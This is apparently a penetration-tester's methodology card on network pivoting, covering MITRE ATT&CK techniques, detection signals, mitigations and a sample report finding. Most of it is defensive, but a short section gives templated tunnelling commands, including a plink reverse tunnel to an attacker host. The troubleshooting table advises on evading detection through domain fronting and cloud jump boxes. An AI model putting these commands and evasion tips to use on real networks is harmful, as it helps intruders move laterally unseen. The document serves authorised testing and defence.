🛡️ Methodology Checklist
- Review MITRE ATT&CK: T1133, T1021, T1571, T1572, T1090 for context
- Baseline all expected listeners and ports before engagement starts
- Identify dual-homed hosts (potential bridges) in scope
- Confirm SIEM coverage for SSH on non-standard ports
- Verify DNS logging is in place for beaconing detection
- Review LOTL tool activity: plink.exe, netsh portproxy, PowerShell tunnels
- Document all pivot activity for client report appendix
🎯 Operational Context
Use when: Understanding what Blue Team can see when pivoting — select lower-detection tunneling methods for sensitive engagements. Think Dumber First: SSH tunnels look like normal SSH traffic (port 22, encrypted). Chisel over port 443 looks like HTTPS. ICMP/DNS tunnels are slower but bypass application-layer filtering. Know what generates alerts before choosing a method. Skip when: Lab environment with no monitoring — skip detection considerations and use the fastest method.
⚡ Tactical Cheatsheet
| Detection Method | What It Catches |
|---|---|
| Network baseline — track all listener ports | New listeners (Chisel, ssh -L, socat) appearing outside approved set |
| SIEM correlate SSH connections to non-standard ports | T1571 — SSH over port 443, 80, or 8080 |
| DNS query log analysis for rhythmic/beaconing patterns | T1572 — DNS tunneling via dnscat2/iodine |
| Netflow analysis for large data transfers on unexpected ports | C2 exfiltration and ICMP tunneling |
| EDR behavioral analysis for LOTL tools | PowerShell reverse tunnels, Plink.exe, netsh portproxy |
| Monitor for dual-homed host communication to new subnets | Pivot host bridging two segments |
| IDS/IPS protocol mismatch detection | HTTP traffic on port 25, SSH on port 80 |
Endpoint: netstat / ss for unexpected listeners | Chisel, Rpivot, socat local forwards |
🔬 Deep Dive & Workflow
Blue Team Baseline Checklist
Quarterly audit minimum:
✓ DNS records — new/changed entries
✓ DHCP leases — unknown hosts
✓ Approved application inventory — flag unknown binaries
✓ Host map — all enterprise hosts located and accounted for
✓ Privileged users — who has elevated permissions
✓ Dual-homed hosts — machines with >1 NIC (potential pivot bridges)
✓ Netbrain/diagrams.net topology — visual baseline for anomaly spotting
MITRE ATT&CK Pivoting Techniques & Mitigations
T1133 — External Remote Services (VPN, Citrix, Web Gateways)
Attacker use: Access internal network via legitimate remote access services.
Detection:
- Log all VPN connection attempts including source IP/geo
- Alert on off-hours admin account logins
Mitigations:
- Segment environment from open internet via firewall
- Block internal protocols from outbound internet access
- Require VPN for service access (network location enforcement)
T1021 — Remote Services (SSH/RDP Lateral Movement)
Attacker use: Valid credentials for SSH/RDP to pivot between hosts.
Detection:
- SIEM: Alert on SSH connections from workstations (non-admin)
- SIEM: Alert on RDP sessions from unexpected source hosts
Mitigations:
- Enforce MFA on all remote access (SSH keys + TOTP)
- Expose infra ports (switches/routers) only to OOB management networks
- Host firewalls: limit RDP/SSH to authorized source subnets only
T1571 — Non-Standard Port Usage
Attacker use: Run C2/tunnels over port 443 or 8080 to evade port-based firewalls.
Detection:
- IDS/IPS: Alert on protocol mismatch (SSH traffic on port 443, DNS on port 53 but with unusual patterns)
- DPI (Deep Packet Inspection): Identify Chisel/Metasploit TLS patterns
Mitigations:
- Baseline which ports are "normal" for each asset class
- Block outbound connections to non-approved destination ports
- NIDS rules for common tunnel tool fingerprints
T1572 — Protocol Tunneling (SSH, DNS, ICMP, HTTP)
Attacker use:
- SSH dynamic (-D), local (-L), remote (-R) tunnels
- DNS tunneling (dnscat2, iodine)
- ICMP tunneling (ptunnel)
- HTTP CONNECT proxy
Detection:
- DNS: Alert on high query volume to single external domain (dnscat beacon)
- DNS: Alert on unusually long TXT/NULL query responses
- ICMP: Alert on ICMP payloads with non-standard sizes or rhythmic timing
- SSH: Alert on ssh processes with -D/-L/-R flags from non-admin users
Mitigations:
- Strict egress filtering: deny outbound except approved business ports
- DNS lockdown: internal hosts must use internal DNS server only (no direct external)
- Analyze beaconing: rhythmic traffic patterns = C2 heartbeat
- Rate limit ICMP responses
T1090 — Proxy Use (Proxychains)
Attacker use: Chain connections through SOCKS proxy to hide true source IP.
Detection:
- Netflow: Internal host making connections through another internal host (proxy chain)
- Source IP analysis: same session arriving from multiple internal hops
Mitigations:
- Allow/block lists for outbound destination IPs
- Netflow analysis: requires baselining normal inter-host traffic
- Zero Trust: verify identity at each hop, not just perimeter
Living Off The Land (LOTL) — Built-in Pivot Tools
Attacker use: Use Windows/Linux built-in tools to avoid dropping binaries.
netsh portproxy add v4tov4 localport=8080 connectaddress=[DEST] connectport=8080
ssh -L [LOCAL_PORT]:[DEST_IP]:[DEST_PORT] user@pivot
plink.exe -R [LPORT]:[LHOST]:[LPORT] user@[ATTACKER]
Detection:
- EDR: Alert on netsh portproxy changes
- Process monitoring: plink.exe, nc.exe, ncat.exe from non-admin context
- Behavioral: receptionist running PowerShell = anomaly
Mitigations:
- EDR/AV tuned and active on all endpoints
- SIEM log correlation: combine endpoint + network logs
- Application allowlisting (AppLocker/WDAC) to block unauthorized binaries
Defense Quick Reference
People: MFA everywhere, especially admin accounts
Security operations for IR and SOC monitoring
Process: Asset management (tag/inventory/monitor all hosts)
Formal access provisioning/de-provisioning
Change management: who/what/when
Technology:
Segment production from management networks
Host-based (HIDS) + Network-based (NIDS) IDS/IPS
SIEM for log correlation (event + network)
Least privilege: HR ≠ switch admin access
Audit legacy misconfigurations regularly
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Tunnel immediately detected | IDS signature match | Switch to more common protocol (HTTPS); avoid known C2 ports (4444, 8888) |
| DNS tunnel too slow | High latency in DNS | DNS tunneling is ~1-3KB/s — only viable for command-and-control, not data transfer |
| ICMP tunnel blocked | ICMP rate-limited or filtered | Use DNS or HTTP tunnel; ICMP is often rate-limited by perimeter devices |
| Chisel traffic detected | TLS inspection | Use domain-fronted CDN or legitimate cloud service for Chisel server to blend traffic |
| SSH tunnel detected by source IP | Known attack box IP in SIEM | Use cloud VM as jump; attacker IP never touches internal network directly |
📝 Reporting Trigger
Finding Title: Encrypted Pivot Tunnel Evades Network Detection Controls Impact: Pivot tunnel encrypted over standard ports (443/22) is indistinguishable from legitimate HTTPS/SSH traffic at the network level, allowing extended dwell time in the internal network without triggering network-based IDS/IPS alerts. Root Cause: Network monitoring limited to unencrypted protocols or known-bad signatures. No endpoint monitoring to correlate process behavior with network connections. Recommendation: Implement SSL/TLS inspection for non-browser outbound traffic. Deploy EDR to correlate process-level network activity with established tunnels. Network behavioral analytics to detect unusual traffic patterns regardless of encryption.